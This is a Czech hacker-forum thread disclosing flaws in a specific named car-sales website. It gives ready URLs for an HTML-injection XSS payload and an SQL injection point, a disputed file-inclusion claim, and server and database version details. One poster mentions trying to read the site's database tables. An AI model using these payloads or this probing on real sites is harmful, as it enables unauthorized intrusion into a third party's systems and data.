autosoft.cz - multiple vulns
BugTrack
| autosoft.cz - multiple vulns | # |
| trosku deravejsi kousek :)
XSS:
www.autosoft.cz/max.php?image=[link]
www.autosoft.cz/max.php?image=”><h1&g
t;dummy</h1><!--
file inclusion:
www.autosoft.cz/max.php?image=[link]
www.autosoft.cz/max.php?image=./skin/autoso
ft/images/mapka/mapka_jihocesky.gif
----------
hack or be hacked :-) .. by greyhats
(odpovědět) | |
|
|
| re: autosoft.cz - multiple vulns | # |
| SQLi:
www.autosoft.cz/nabidka.php?menu=nabidka&am
p;vyhledat=1&druhVozidla=&znacka=vo
lkswagen&typ=passat&typKaroserie=&a
mp;palivo=benz%EDn&rokVyrobyOd=2005&
;rokVyrobyDo=SQLi&prodejniCenaOd=&p
rodejniCenaDo=&kraj=&odkud=1&ko
lik=75&rozliseni=1920
----------
hack or be hacked :-) .. by greyhats
(odpovědět) | |
|
|
| re: autosoft.cz - multiple vulns | # |
| Pouze pro upřesnění: Ten vstup z proměnné se pouze vloží do HTML výstupu jako obsah atributu SRC u IMG - proto XSS nebo Content spoofing. File inclusion, bych tomu ale nerikal - obsah samotného souboru se totiž na serveru nikam neincluduje.
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět) | |
|
|
| re: autosoft.cz - multiple vulns | # |
| ok omlouvam se.. v tom pripade je to pouze XSS vsechno ..
----------
hack or be hacked :-) .. by greyhats
(odpovědět) | |
|
|
| re: autosoft.cz - multiple vulns | # |
| btw mensi info k systemu:
OS: Windows 2003
Technologie: ASP.NET, Microsoft IIS 6.0, PHP 4.4.7
Databaze: MySQL 4 (tady to je tezkej provar, s tak starou dtb jsem nikdy nepracoval.. tak mi dela problem se kouknout na tabulky)
----------
hack or be hacked :-) .. by greyhats
(odpovědět) | |
|
|
